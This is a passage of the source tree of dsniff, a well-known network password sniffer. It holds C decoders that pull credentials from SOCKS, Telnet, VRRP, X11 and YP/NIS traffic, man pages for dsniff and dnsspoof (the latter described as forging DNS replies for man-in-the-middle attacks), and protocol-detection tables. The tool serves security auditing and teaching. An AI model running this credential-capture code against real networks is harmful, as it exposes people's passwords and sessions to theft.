	if (asn1_type(&inbuf) != ASN1_INTEGER)
		return (0);
	if (asn1_len(&inbuf) != 1)	/* XXX - check version length */
		return (0);
	buf_get(&inbuf, &vers, sizeof(vers));

	if (asn1_type(&inbuf) != ASN1_STRING)
		return (0);
	i = asn1_len(&inbuf);
	b = buf_tok(&inbuf, NULL, i);
	p = buf_strdup(b);

	buf_putf(&outbuf, "[version %d]\n%s\n", vers + 1, p);
	free(p);
	buf_end(&outbuf);

	return (buf_len(&outbuf));
}

--------------------------------------------------------------------------------
/decode_socks.c:
--------------------------------------------------------------------------------
/*
 * decode_socks.c
 *
 * NEC SOCKS.
 *
 * Copyright (c) 2000 Dug Song
 *
 * $Id: decode_socks.c,v 1.4 2001/03/15 08:33:02 dugsong Exp $
 */

#include "config.h"

#include

#include
#include
#include

#include "decode.h"

int
decode_socks(u_char *buf, int len, u_char *obuf, int olen)
{
	u_char *p;
	int i, n;

	p = buf;

	if (len < 4 || *p++ != 5)		/* SOCKS version */
		return (0);

	if ((n = *p++) > len - 5)		/* nmethods */
		return (0);

	for (i = 0; i < n; i++)			/* USERNAME/PASSWORD method?
*/ 36 | if (p[i] == 2) break; 37 | 38 | if (i == n) return (0); 39 | 40 | p += n; 41 | if (*p++ != 1) return (0); /* USERNAME/PASSWORD version */ 42 | 43 | n = *p++; 44 | if (n > len - (p - buf)) 45 | return (0); 46 | 47 | memmove(p - 1, p, n); p[n - 1] = '\0'; 48 | snprintf(obuf, olen, "%s ", p - 1); 49 | p += n; 50 | 51 | n = *p++; 52 | if (n > len - (p - buf)) 53 | return (0); 54 | 55 | memmove(p - 1, p, n); p[n - 1] = '\0'; 56 | strlcat(obuf, p - 1, olen); 57 | strlcat(obuf, "\n", olen); 58 | 59 | return (strlen(obuf)); 60 | } 61 | 62 | -------------------------------------------------------------------------------- /decode_ssh.c: -------------------------------------------------------------------------------- 1 | #include "config.h" 2 | 3 | #include 4 | 5 | #include 6 | #include 7 | #include 8 | 9 | #include 10 | #include 11 | 12 | #include "options.h" 13 | #include "decode.h" 14 | 15 | extern struct _dc_meta dc_meta; 16 | 17 | int 18 | decode_ssh(u_char *buf, int len, u_char *obuf, int olen) { 19 | u_char *ptr = ""; 20 | 21 | if (!Opt_verbose) 22 | return 0; 23 | 24 | if (strncmp(buf, "SSH-", 4) != 0) 25 | return 0; 26 | 27 | if (dc_meta.rbuf != NULL) 28 | ptr = ascii_string(dc_meta.rbuf, dc_meta.rlen); 29 | 30 | snprintf(obuf, olen, "%s >>> %s", ascii_string(buf, len), ptr); 31 | 32 | return (strlen(obuf)); 33 | } 34 | 35 | -------------------------------------------------------------------------------- /decode_telnet.c: -------------------------------------------------------------------------------- 1 | /* 2 | * decode_telnet.c 3 | * 4 | * Telnet. 
5 |  *
6 |  * Copyright (c) 2000 Dug Song
7 |  *
8 |  * $Id: decode_telnet.c,v 1.5 2001/03/15 08:33:03 dugsong Exp $
9 |  */
10 |
11 | #include "config.h"
12 |
13 | #include
14 |
15 | #include
16 | #include
17 | #include
18 |
19 | #include "options.h"
20 | #include "decode.h"
21 |
22 | int
23 | decode_telnet(u_char *buf, int len, u_char *obuf, int olen)
24 | {
25 | 	if ((len = strip_telopts(buf, len)) == 0)
26 | 		return (0);
27 |
28 | 	if (!is_ascii_string(buf, len))
29 | 		return (0);
30 |
31 | 	if (strip_lines(buf, Opt_lines) < 2)
32 | 		return (0);
33 |
34 | 	strlcpy(obuf, buf, olen);
35 |
36 | 	return (strlen(obuf));
37 | }
38 |
39 |
--------------------------------------------------------------------------------
/decode_vrrp.c:
--------------------------------------------------------------------------------
1 | /*
2 |  * decode_vrrp.c
3 |  *
4 |  * Virtual Router Redundancy Protocol.
5 |  *
6 |  * Copyright (c) 2000 Eric Jackson
7 |  * Copyright (c) 2000 Dug Song
8 |  *
9 |  * $Id: decode_vrrp.c,v 1.5 2001/03/15 08:33:03 dugsong Exp $
10 |  */
11 |
12 | #include "config.h"
13 |
14 | #include
15 |
16 | #include
17 | #include
18 | #include
19 |
20 | #include "buf.h"
21 | #include "decode.h"
22 |
23 | struct vrrp_header {
24 | 	u_char	vr_vers;	/* Version */
25 | 	u_char	vr_vrid;	/* Virtual Router ID */
26 | 	u_char	vr_prio;	/* Router Priority */
27 | 	u_char	vr_naddr;	/* # of addresses */
28 | 	u_char	vr_auth;	/* Type of Authentication */
29 | 	u_char	vr_advr;	/* ADVERTISEMENT Interval */
30 | 	u_short	vr_cksum;	/* Checksum */
31 | 	/* vr_naddr * 4 # of addresses */
32 | };
33 | #define VRRP_AUTH_NONE		0
34 | #define VRRP_AUTH_SIMPLE	1
35 | #define VRRP_AUTH_AH		2
36 |
37 | #define VRRP_AUTH_DATA_LEN	8
38 |
39 | int
40 | decode_vrrp(u_char *buf, int len, u_char *obuf, int olen)
41 | {
42 | 	struct buf *b, inbuf, outbuf;
43 | 	struct vrrp_header *vrrp;
44 |
45 | 	buf_init(&inbuf, buf, len);
46 | 	buf_init(&outbuf, obuf, olen);
47 |
48 | 	vrrp = (struct vrrp_header *)buf_ptr(&inbuf);
49 |
50 | 	if (buf_len(&inbuf) < sizeof(*vrrp))
51 | 		return (0);
52 |
53 | 	/* We only care about VRRP_AUTH_SIMPLE */
54 | 	if (vrrp->vr_auth != VRRP_AUTH_SIMPLE)	/* one byte: no ntohs() */
55 | 		return (0);
56 |
57 | 	/* XXX - probably want to verify checksum */
58 |
59 | 	/* Forward to Authentication Data */
60 | 	buf_skip(&inbuf, sizeof(*vrrp) + 8 + (vrrp->vr_naddr * 4));
61 |
62 | 	if ((b = buf_tok(&inbuf, NULL, VRRP_AUTH_DATA_LEN)) == NULL)
63 | 		return (0);
64 |
65 | 	buf_put(&outbuf, buf_ptr(b), buf_len(b));
66 | 	buf_put(&outbuf, "\n", 1);
67 | 	buf_end(&outbuf);
68 |
69 | 	return (buf_len(&outbuf));
70 | }
71 |
--------------------------------------------------------------------------------
/decode_x11.c:
--------------------------------------------------------------------------------
1 | /*
2 |  * decode_x11.c
3 |  *
4 |  * X11.
5 |  *
6 |  * Copyright (c) 2000 Dug Song
7 |  *
8 |  * $Id: decode_x11.c,v 1.4 2001/03/15 08:33:03 dugsong Exp $
9 |  */
10 |
11 | #include "config.h"
12 |
13 | #include
14 |
15 | #include
16 | #include
17 | #include
18 | #include
19 |
20 | #include "decode.h"
21 |
22 | int
23 | decode_x11(u_char *buf, int len, u_char *obuf, int olen)
24 | {
25 | 	char *p, *q;
26 | 	int i;
27 |
28 | 	p = buf + 12;
29 |
30 | 	/* Validate lengths before reading buf[12..29] or writing obuf[19..52]. */
31 | 	if (len < 36 || olen < 53 ||
32 | 	    strncmp(p, "MIT-MAGIC-COOKIE-1", 18) != 0)
33 | 		return (0);
34 |
35 | 	strlcpy(obuf, "MIT-MAGIC-COOKIE-1 ", olen);
36 |
37 | 	p += 20;
38 | 	len -= 32;	/* p is now buf + 32: 12-byte header + 20-byte padded name */
39 | 	q = obuf + 19;
40 |
41 | 	for (i = 0; i < 16 && i < len; i++)
42 | 		sprintf(q + (i * 2), "%.2x", (u_char)p[i]);
43 | 	strlcat(obuf, "\n", olen);
44 |
45 | 	return (strlen(obuf));
46 | }
47 |
48 |
--------------------------------------------------------------------------------
/decode_yp.c:
--------------------------------------------------------------------------------
1 | /*
2 |  * decode_yp.c
3 |  *
4 |  * RPC "Yellow Pee".
5 |  *
6 |  * Totally untested, i don't run YP. Let me know if this works.
:-) 7 | * 8 | * Copyright (c) 2000 Dug Song 9 | * 10 | * $Id: decode_yp.c,v 1.6 2001/03/15 08:33:03 dugsong Exp $ 11 | */ 12 | 13 | #include "config.h" 14 | 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | 21 | #include 22 | #include 23 | #include 24 | 25 | #include "rpc.h" 26 | #include "decode.h" 27 | 28 | /* XXX - varies on different systems :-( */ 29 | 30 | struct my_passwd { 31 | char *pw_name; 32 | char *pw_passwd; 33 | int pw_uid; 34 | int pw_gid; 35 | char *pw_gecos; 36 | char *pw_dir; 37 | char *pw_shell; 38 | }; 39 | 40 | struct my_yppasswd { 41 | char *oldpass; 42 | struct my_passwd newpw; 43 | }; 44 | 45 | static bool_t 46 | xdr_my_passwd(XDR *xdrs, struct my_passwd *objp) 47 | { 48 | if (xdr_string(xdrs, &objp->pw_name, ~0) && 49 | xdr_string(xdrs, &objp->pw_passwd, ~0) && 50 | xdr_int(xdrs, &objp->pw_uid) && 51 | xdr_int(xdrs, &objp->pw_gid) && 52 | xdr_string(xdrs, &objp->pw_gecos, ~0) && 53 | xdr_string(xdrs, &objp->pw_dir, ~0) && 54 | xdr_string(xdrs, &objp->pw_shell, ~0)) 55 | return (TRUE); 56 | 57 | return (FALSE); 58 | } 59 | 60 | static bool_t 61 | xdr_my_yppasswd(XDR *xdrs, struct my_yppasswd *objp) 62 | { 63 | if (xdr_string(xdrs, &objp->oldpass, ~0) && 64 | xdr_my_passwd(xdrs, &objp->newpw)) 65 | return (TRUE); 66 | 67 | return (FALSE); 68 | } 69 | 70 | int 71 | decode_yppasswd(u_char *buf, int len, u_char *obuf, int olen) 72 | { 73 | struct rpc_msg msg; 74 | struct my_yppasswd yp; 75 | XDR xdrs; 76 | int hdrlen; 77 | 78 | if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) 79 | return (0); 80 | 81 | obuf[0] = '\0'; 82 | 83 | if (msg.rm_direction == CALL && 84 | msg.rm_call.cb_prog == YPPASSWDPROG && 85 | msg.rm_call.cb_proc == YPPASSWDPROC_UPDATE) { 86 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); 87 | memset(&yp, 0, sizeof(yp)); 88 | if (xdr_my_yppasswd(&xdrs, &yp)) { 89 | snprintf(obuf, olen, 90 | "%s\n%s:%s:%d:%d:%s:%s:%s\n", 91 | yp.oldpass, yp.newpw.pw_name, 92 | yp.newpw.pw_passwd, 
yp.newpw.pw_uid, 93 | yp.newpw.pw_gid, yp.newpw.pw_gecos, 94 | yp.newpw.pw_dir, yp.newpw.pw_shell); 95 | } 96 | xdr_destroy(&xdrs); 97 | } 98 | return (strlen(obuf)); 99 | } 100 | 101 | int 102 | decode_ypserv(u_char *buf, int len, u_char *obuf, int olen) 103 | { 104 | struct rpc_msg msg; 105 | struct xid_map *xm; 106 | char *domain; 107 | bool_t status; 108 | XDR xdrs; 109 | int hdrlen; 110 | 111 | if ((hdrlen = rpc_decode(buf, len, &msg)) == 0) 112 | return (0); 113 | 114 | obuf[0] = '\0'; 115 | 116 | if (msg.rm_direction == CALL && 117 | msg.rm_call.cb_prog == YPPROG && 118 | msg.rm_call.cb_proc == YPPROC_DOMAIN) { 119 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, XDR_DECODE); 120 | domain = NULL; 121 | if (xdr_string(&xdrs, &domain, YPMAXDOMAIN)) { 122 | if ((domain = strdup(domain)) != NULL) 123 | xid_map_enter(msg.rm_xid, YPPROG, YPVERS, 124 | YPPROC_DOMAIN, (void *) domain); 125 | } 126 | xdr_destroy(&xdrs); 127 | } 128 | else if (msg.rm_direction == REPLY && 129 | (xm = xid_map_find(msg.rm_xid)) != NULL) { 130 | if (msg.rm_reply.rp_stat == MSG_ACCEPTED && 131 | msg.acpted_rply.ar_stat == SUCCESS) { 132 | xdrmem_create(&xdrs, buf + hdrlen, len - hdrlen, 133 | XDR_DECODE); 134 | if (xdr_bool(&xdrs, &status)) { 135 | if (status == TRUE) 136 | snprintf(obuf, olen, "%s\n", 137 | (char *)xm->data); 138 | } 139 | xdr_destroy(&xdrs); 140 | } 141 | free(xm->data); 142 | memset(xm, 0, sizeof(*xm)); 143 | } 144 | return (strlen(obuf)); 145 | } 146 | -------------------------------------------------------------------------------- /dnsspoof.8: -------------------------------------------------------------------------------- 1 | .TH DNSSPOOF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | dnsspoof 6 | \- 7 | forge replies to DNS address / pointer queries 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBdnsspoof\fR [\fB-i \fIinterface\fR] [\fB-f \fIhostsfile\fR] 13 | [\fIexpression\fR] 14 | .SH DESCRIPTION 15 | .ad 16 | .fi 17 | \fBdnsspoof\fR forges replies to arbitrary DNS 
address / pointer queries 18 | on the LAN. This is useful in bypassing hostname-based access controls, 19 | or in implementing a variety of man-in-the-middle attacks. 20 | .SH OPTIONS 21 | .IP "\fB-i \fIinterface\fR" 22 | Specify the interface to use. 23 | .IP "\fB-f \fIhostsfile\fR" 24 | Specify the pathname of a file in hosts(5) format. Only one hostname 25 | allowed per line (no aliases), although hostnames may contain 26 | wildcards (such as \fI*.doubleclick.net\fR). 27 | .IP "\fIexpression\fR" 28 | Specify a tcpdump(8) filter expression to select traffic to sniff. 29 | .LP 30 | If no \fIhostsfile\fR is specified, replies will be forged for all 31 | address queries on the LAN with an answer of the local machine's IP 32 | address. 33 | .SH FILES 34 | .IP \fI/usr/share/dsniff/dnsspoof.hosts\fR 35 | Sample hosts file. 36 | .SH "SEE ALSO" 37 | dsniff(8), hosts(5) 38 | .SH AUTHOR 39 | .na 40 | .nf 41 | Dug Song 42 | -------------------------------------------------------------------------------- /dnsspoof.hosts: -------------------------------------------------------------------------------- 1 | # $Id: dnsspoof.hosts,v 1.2 2000/08/28 13:28:21 dugsong Exp $ 2 | # 3 | # Sample hosts file for dnsspoof - kill web banner ads for Niels. 
:-) 4 | # 5 | 127.0.0.1 ad.* 6 | 127.0.0.1 ads*.* 7 | 127.0.0.1 adbot*.* 8 | 127.0.0.1 adcount*.* 9 | 127.0.0.1 adfinity*.* 10 | 127.0.0.1 adforce*.* 11 | 127.0.0.1 adimage*.* 12 | 127.0.0.1 adlink*.* 13 | 127.0.0.1 adserv*.* 14 | 127.0.0.1 adremote*.* 15 | 127.0.0.1 adv.* 16 | 127.0.0.1 advert*.* 17 | 127.0.0.1 banner*.* 18 | 127.0.0.1 count*.* 19 | 127.0.0.1 promo*.* 20 | 127.0.0.1 werbung*.* 21 | 127.0.0.1 *ads*.*.com 22 | 127.0.0.1 *.adbot.com 23 | 127.0.0.1 *.adone.com 24 | 127.0.0.1 *.adforce.com 25 | 127.0.0.1 *.ad-up.com 26 | 127.0.0.1 *.advert*.* 27 | 127.0.0.1 *.banner*.* 28 | 127.0.0.1 *.bfast.com 29 | 127.0.0.1 *.burstnet.com 30 | 127.0.0.1 *.doubleclick.net 31 | 127.0.0.1 *.focalink.com 32 | 127.0.0.1 *.flycast.com 33 | 127.0.0.1 *.freestats.com 34 | 127.0.0.1 *.hitbox.com 35 | 127.0.0.1 *.globaltrack.com 36 | 127.0.0.1 *.globaltrak.net 37 | 127.0.0.1 *.imagine-inc.com 38 | 127.0.0.1 *.imgis.com 39 | 127.0.0.1 *.link*.com 40 | 127.0.0.1 *.memory.net 41 | 127.0.0.1 *.preferences.com 42 | 127.0.0.1 *.smartclicks.com 43 | 127.0.0.1 *.sponsorpool.net 44 | 127.0.0.1 *.stats.net 45 | 127.0.0.1 *.stattrax.com 46 | 127.0.0.1 *.*tracker.com 47 | 127.0.0.1 *.valueclick.com 48 | 127.0.0.1 *.wisewire.com 49 | -------------------------------------------------------------------------------- /dsniff.8: -------------------------------------------------------------------------------- 1 | .TH DSNIFF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | dsniff 6 | \- 7 | password sniffer 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBdsniff\fR [\fB-v\fR] [\fB-c\fR] [\fB-a\fR] [\fB-d\fR] [\fB-m\fR] [\fB-D\fR] [\fB-N\fR] [\fB-P\fR] [\fB-i 13 | \fIinterface\fR | \fB-p \fIpcapfile\fR] [\fB-s \fIsnaplen\fR] [\fB-M \fImagics\fR] [\fB-f \fIservices\fR] 14 | [\fB-t \fItrigger[,...]\fR] 15 | [\fB-r\fR|\fB-w\fR \fIsavefile\fR] [\fIexpression\fR] 16 | .SH DESCRIPTION 17 | .ad 18 | .fi 19 | \fBdsniff\fR is a password sniffer which handles FTP, Telnet, SMTP, 20 | HTTP, POP, poppass, NNTP, IMAP, 
SNMP, LDAP, Rlogin, RIP, OSPF, PPTP
21 | MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ, Napster,
22 | PostgreSQL, Meeting Maker, Citrix ICA, Symantec pcAnywhere, NAI
23 | Sniffer, Microsoft SMB, Oracle SQL*Net, Sybase and Microsoft SQL
24 | protocols.
25 | .LP
26 | \fBdsniff\fR automatically detects and minimally parses each
27 | application protocol, only saving the interesting bits, and uses
28 | Berkeley DB as its output file format, only logging unique
29 | authentication attempts. Full TCP/IP reassembly is provided by
30 | libnids(3).
31 | .LP
32 | I wrote \fBdsniff\fR with honest intentions - to audit my own network,
33 | and to demonstrate the insecurity of cleartext network protocols.
34 | Please do not abuse this software.
35 | .SH OPTIONS
36 | .IP \fB-c\fR
37 | Perform half-duplex TCP stream reassembly, to handle asymmetrically
38 | routed traffic (such as when using arpspoof(8) to intercept client
39 | traffic bound for the local gateway).
40 | .IP \fB-v\fR
41 | Verbose. Show banners.
42 | .IP \fB-a\fR
43 | Show all results. Otherwise dsniff tries not to show too many duplicates.
44 | .IP \fB-d\fR
45 | Enable debugging mode.
46 | .IP \fB-m\fR
47 | Force protocol detection/DPI also on known services. For example, -m will detect SSH _and_ HTTPS on port 443.
48 | .IP \fB-N\fR
49 | Resolve IP addresses to hostnames.
50 | .IP \fB-P\fR
51 | Enable promiscuous mode.
52 | .IP \fB-C\fR
53 | Force color output even if not a tty.
54 | .IP \fB-D\fR
55 | Disable DPI. Only decode known services (DPI is enabled by default on unknown ports).
56 | .IP "\fB-i \fIinterface\fR"
57 | Specify the interface to listen on.
58 | .IP "\fB-p \fIpcapfile\fR"
59 | Rather than processing the contents of packets observed upon the network,
60 | process the given PCAP capture file.
61 | .IP "\fB-s \fIsnaplen\fR"
62 | Analyze at most the first \fIsnaplen\fR bytes of each TCP connection,
63 | rather than the default of 1024.
64 | .IP "\fB-f \fIservices\fR"
65 | Load triggers from a \fIservices\fR file. Default is to use the internal triggers.
66 | .IP "\fB-M \fImagicfile\fR"
67 | Load \fImagics\fR from file. Default is to use the internal magic. Cannot be used with \fI-t\fR.
68 | .IP "\fB-t \fItrigger\fR[,...]"
69 | Load triggers from a comma-separated list, specified as
70 | \fIport\fR/\fIproto\fR=\fIservice\fR (e.g. 80/tcp=http).
71 | .IP "\fB-r \fIsavefile\fR"
72 | Read sniffed sessions from a \fIsavefile\fR created with the \fB-w\fR
73 | option.
74 | .IP "\fB-w \fIsavefile\fR"
75 | Write sniffed sessions to \fIsavefile\fR rather than parsing and
76 | printing them out.
77 | .IP "\fIexpression\fR"
78 | Specify a tcpdump(8) filter expression to select traffic to sniff.
79 | .LP
80 | On a hangup signal \fBdsniff\fR will dump its current trigger table to
81 | \fIdsniff.services\fR.
82 | .SH FILES
83 | .IP \fI/usr/share/dsniff/dsniff.services\fR
84 | Default trigger table
85 | .IP \fI/usr/share/dsniff/dsniff.magic\fR
86 | Network protocol magic
87 | .SH "SEE ALSO"
88 | arpspoof(8), libnids(3), services(5), magic(5)
89 | .SH AUTHOR
90 | .na
91 | .nf
92 | Dug Song
93 | .SH BUGS
94 | \fBdsniff\fR's automatic protocol detection feature is based on the
95 | classic file(1) command by Ian Darwin, and shares its historical
96 | limitations and bugs.
97 |
--------------------------------------------------------------------------------
/dsniff.magic:
--------------------------------------------------------------------------------
1 | # $Id: dsniff.magic,v 1.8 2000/07/19 03:22:02 dugsong Exp $
2 | #
3 | # Network protocol magic(5) for dsniff.
4 | # 5 | #0 string FLAPON aim 6 | 0 string BEGIN\ cvs 7 | 8 | 0 string SYST ftp 9 | 0 string USER\ ftp ftp 10 | 0 string USER\ anonymous ftp 11 | 12 | 0 string HELO\ smtp 13 | 0 string EHLO\ smtp 14 | 15 | 0 string GET\ / http 16 | 0 string POST\ / http 17 | 0 string CONNECT\ http 18 | 19 | 1 string \ ID\ imap 20 | 2 string \ ID\ imap 21 | 3 string \ ID\ imap 22 | 4 string \ ID\ imap 23 | 5 string \ ID\ imap 24 | 25 | 1 string \ LOGIN\ imap 26 | 2 string \ LOGIN\ imap 27 | 3 string \ LOGIN\ imap 28 | 4 string \ LOGIN\ imap 29 | 5 string \ LOGIN\ imap 30 | 31 | 1 string \ AUTHENTICATE\ PLAIN\ imap 32 | 2 string \ AUTHENTICATE\ PLAIN\ imap 33 | 3 string \ AUTHENTICATE\ PLAIN\ imap 34 | 4 string \ AUTHENTICATE\ PLAIN\ imap 35 | 5 string \ AUTHENTICATE\ PLAIN\ imap 36 | 37 | 0 string NICK\ irc 38 | 39 | 0 string USER\ pop 40 | 0 string AUTH\ pop 41 | 42 | 12 string MIT-MAGIC x11 43 | 44 | 0 string LIST nntp 45 | 0 string GROUP nntp 46 | 0 string NEW nntp 47 | 0 string ARTICLE nntp 48 | 49 | 0 belong 0x7f7f4943 50 | >4 beshort 0x4100 citrix 51 | 52 | #0 belong 0x0200e803 icq 53 | 54 | 0 beshort 0x1603 55 | >2 byte 0x01 56 | >>5 byte 0x01 57 | >>>9 byte 0x03 https 58 | 59 | 8 belong 0x0135012c 60 | >12 belong 0x0c010800 61 | >>16 belong 0x7fff7f08 62 | >>>20 belong 0x00000001 oracle 63 | 64 | 0 belong 0x0 65 | >4 byte 0x8d pcanywhere 66 | >5 byte 0x6 pcanywhere 67 | 68 | 132 belong 0x0301060a 69 | >242 belong 0 tds 70 | 32 belong 0xe0031000 71 | >36 belong 0x2c010000 tds 72 | 73 | 12 belong 100000 74 | >4 belong 0 75 | >>8 belong 2 portmap 76 | 12 belong 100005 77 | >4 belong 0 78 | >>8 belong 2 mountd 79 | 12 belong 100009 80 | >4 belong 0 81 | >>8 belong 2 yppasswd 82 | 83 | 16 belong 100000 84 | >8 belong 0 85 | >>12 belong 2 portmap 86 | 16 belong 100005 87 | >8 belong 0 88 | >>12 belong 2 mountd 89 | 16 belong 100009 90 | >8 belong 0 91 | >>12 belong 2 yppasswd 92 | 93 | 0 belong 296 94 | >4 belong 0x20000 postgresql 95 | 96 | 0 belong 0x81000048 97 | >33 string 
CACA smb 98 | 99 | 0 beshort >0xfff9 100 | >2 byte <40 101 | >>3 beshort >0xfff9 102 | >>>5 byte <40 telnet 103 | 104 | 0 string SSH- ssh 105 | 106 | #2 leshort 2 107 | #>(0.b+6) leshort 208 napster 108 | #>(0.b+6) leshort 2 napster 109 | 110 | 0 byte 0x38 111 | >8 belong 0x00002455 mmxp 112 | 113 | 0 byte 5 114 | >6 leshort 260 115 | >>32 byte 0 sniffer 116 | >6 leshort 261 117 | >>32 lelong -1 sniffer 118 | >1 belong 0 119 | >>5 byte 0 icq 120 | >(1.b+1) byte 1 socks 121 | 122 | 0 byte&0x1f 16 123 | >2 byte&0x1f 2 124 | >>5 byte 0x60 ldap 125 | >4 byte&0x1f 2 126 | >>5 beshort&0xfffc 0x0100 127 | >>>7 byte&0x1f 4 snmp 128 | -------------------------------------------------------------------------------- /dsniff.services: -------------------------------------------------------------------------------- 1 | # $Id: dsniff.services,v 1.8 2000/12/15 20:10:58 dugsong Exp $ 2 | # 3 | # Network services, dsniff style 4 | # 5 | ftp 21/tcp 6 | ssh 22/tcp 7 | telnet 23/tcp 8 | smtp 25/tcp 9 | pptp 47/ip 10 | http 80/tcp 11 | ospf 89/ip 12 | http 98/tcp 13 | poppass 106/tcp 14 | pop2 109/tcp 15 | pop3 110/tcp 16 | portmap 111/tcp 17 | portmap -111/tcp 18 | portmap 111/udp 19 | portmap -111/udp 20 | vrrp 112/ip 21 | nntp 119/tcp 22 | smb 139/tcp 23 | imap 143/tcp 24 | snmp 161/udp 25 | imap 220/tcp 26 | telnet 261/tcp 27 | ldap 389/tcp 28 | mmxp 417/tcp 29 | mmxp 417/udp 30 | https 443/tcp 31 | rlogin 512/tcp 32 | rlogin 513/tcp 33 | rlogin 514/tcp 34 | rip 520/udp 35 | smtp 587/tcp 36 | socks 1080/tcp 37 | tds 1433/tcp 38 | tds 1433/udp 39 | citrix 1494/tcp 40 | oracle 1521/tcp 41 | oracle 1526/tcp 42 | sniffer 2001/udp 43 | cvs 2401/tcp 44 | mmxp 2417/tcp 45 | mmxp 2417/udp 46 | tds 2638/tcp 47 | http 3128/tcp 48 | icq 4000/udp 49 | napster 4444/tcp 50 | aim 5190/tcp 51 | postgresql 5432/tcp 52 | napster 5555/tcp 53 | pcanywhere 5631/tcp 54 | x11 6000/tcp 55 | x11 6001/tcp 56 | x11 6002/tcp 57 | x11 6003/tcp 58 | x11 6004/tcp 59 | x11 6005/tcp 60 | napster 6666/tcp 61 | irc 
6667/tcp 62 | irc 6668/tcp 63 | irc 6669/tcp 64 | tds 7599/tcp 65 | napster 7777/tcp 66 | http 8080/tcp 67 | napster 8888/tcp 68 | aim 9898/tcp 69 | pcanywhere 65301/tcp 70 | mountd 100005/rpc 71 | ypserv 100004/rpc 72 | yppasswd 100009/rpc 73 | -------------------------------------------------------------------------------- /dsniff_magic.h: -------------------------------------------------------------------------------- 1 | // grep -v ^# dsniff.magic | while read -r x; do echo '"'"${x//\\/\\\\}"'", \'; done >>dsniff_magic.h 2 | 3 | static char *mgx[] = {\ 4 | "0 string BEGIN\\ cvs", \ 5 | "", \ 6 | "0 string SYST ftp", \ 7 | "0 string USER\\ ftp ftp", \ 8 | "0 string USER\\ anonymous ftp", \ 9 | "", \ 10 | "0 string HELO\\ smtp", \ 11 | "0 string EHLO\\ smtp", \ 12 | "", \ 13 | "0 string GET\\ / http", \ 14 | "0 string POST\\ / http", \ 15 | "0 string CONNECT\\ http", \ 16 | "", \ 17 | "1 string \\ ID\\ imap", \ 18 | "2 string \\ ID\\ imap", \ 19 | "3 string \\ ID\\ imap", \ 20 | "4 string \\ ID\\ imap", \ 21 | "5 string \\ ID\\ imap", \ 22 | "", \ 23 | "1 string \\ LOGIN\\ imap", \ 24 | "2 string \\ LOGIN\\ imap", \ 25 | "3 string \\ LOGIN\\ imap", \ 26 | "4 string \\ LOGIN\\ imap", \ 27 | "5 string \\ LOGIN\\ imap", \ 28 | "", \ 29 | "1 string \\ AUTHENTICATE\\ PLAIN\\ imap", \ 30 | "2 string \\ AUTHENTICATE\\ PLAIN\\ imap", \ 31 | "3 string \\ AUTHENTICATE\\ PLAIN\\ imap", \ 32 | "4 string \\ AUTHENTICATE\\ PLAIN\\ imap", \ 33 | "5 string \\ AUTHENTICATE\\ PLAIN\\ imap", \ 34 | "", \ 35 | "0 string NICK\\ irc", \ 36 | "", \ 37 | "0 string USER\\ pop3", \ 38 | "0 string AUTH\\ pop3", \ 39 | "", \ 40 | "12 string MIT-MAGIC x11", \ 41 | "", \ 42 | "0 string LIST nntp", \ 43 | "0 string GROUP nntp", \ 44 | "0 string NEW nntp", \ 45 | "0 string ARTICLE nntp", \ 46 | "", \ 47 | "0 belong 0x7f7f4943", \ 48 | ">4 beshort 0x4100 citrix", \ 49 | "", \ 50 | "", \ 51 | "0 beshort 0x1603", \ 52 | ">2 byte 0x01", \ 53 | ">>5 byte 0x01", \ 54 | ">>>9 byte 0x03 https", \ 55 | 
"", \ 56 | "8 belong 0x0135012c", \ 57 | ">12 belong 0x0c010800", \ 58 | ">>16 belong 0x7fff7f08", \ 59 | ">>>20 belong 0x00000001 oracle", \ 60 | "", \ 61 | "0 belong 0x0", \ 62 | ">4 byte 0x8d pcanywhere", \ 63 | ">5 byte 0x6 pcanywhere", \ 64 | "", \ 65 | "132 belong 0x0301060a", \ 66 | ">242 belong 0 tds", \ 67 | "32 belong 0xe0031000", \ 68 | ">36 belong 0x2c010000 tds", \ 69 | "", \ 70 | "12 belong 100000", \ 71 | ">4 belong 0", \ 72 | ">>8 belong 2 portmap", \ 73 | "12 belong 100005", \ 74 | ">4 belong 0", \ 75 | ">>8 belong 2 mountd", \ 76 | "12 belong 100009", \ 77 | ">4 belong 0", \ 78 | ">>8 belong 2 yppasswd", \ 79 | "", \ 80 | "16 belong 100000", \ 81 | ">8 belong 0", \ 82 | ">>12 belong 2 portmap", \ 83 | "16 belong 100005", \ 84 | ">8 belong 0", \ 85 | ">>12 belong 2 mountd", \ 86 | "16 belong 100009", \ 87 | ">8 belong 0", \ 88 | ">>12 belong 2 yppasswd", \ 89 | "", \ 90 | "0 belong 296", \ 91 | ">4 belong 0x20000 postgresql", \ 92 | "", \ 93 | "0 belong 0x81000048", \ 94 | ">33 string CACA smb", \ 95 | "", \ 96 | "0 beshort >0xfff9", \ 97 | ">2 byte <40", \ 98 | ">>3 beshort >0xfff9", \ 99 | ">>>5 byte <40 telnet", \ 100 | "", \ 101 | "0 string SSH- ssh", \ 102 | "", \ 103 | "", \ 104 | "0 byte 0x38", \ 105 | ">8 belong 0x00002455 mmxp", \ 106 | "", \ 107 | "0 byte 5", \ 108 | ">6 leshort 260", \ 109 | ">>32 byte 0 sniffer", \ 110 | ">6 leshort 261", \ 111 | ">>32 lelong -1 sniffer", \ 112 | ">1 belong 0", \ 113 | ">>5 byte 0 icq", \ 114 | ">(1.b+1) byte 1 socks", \ 115 | "", \ 116 | "0 byte&0x1f 16", \ 117 | ">2 byte&0x1f 2", \ 118 | ">>5 byte 0x60 ldap", \ 119 | ">4 byte&0x1f 2", \ 120 | ">>5 beshort&0xfffc 0x0100", \ 121 | ">>>7 byte&0x1f 4 snmp", \ 122 | }; 123 | -------------------------------------------------------------------------------- /dsniff_services.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | //grep -v ^# dsniff.services | while read -r x; do s="${x##*$'\t'}"; echo -e 
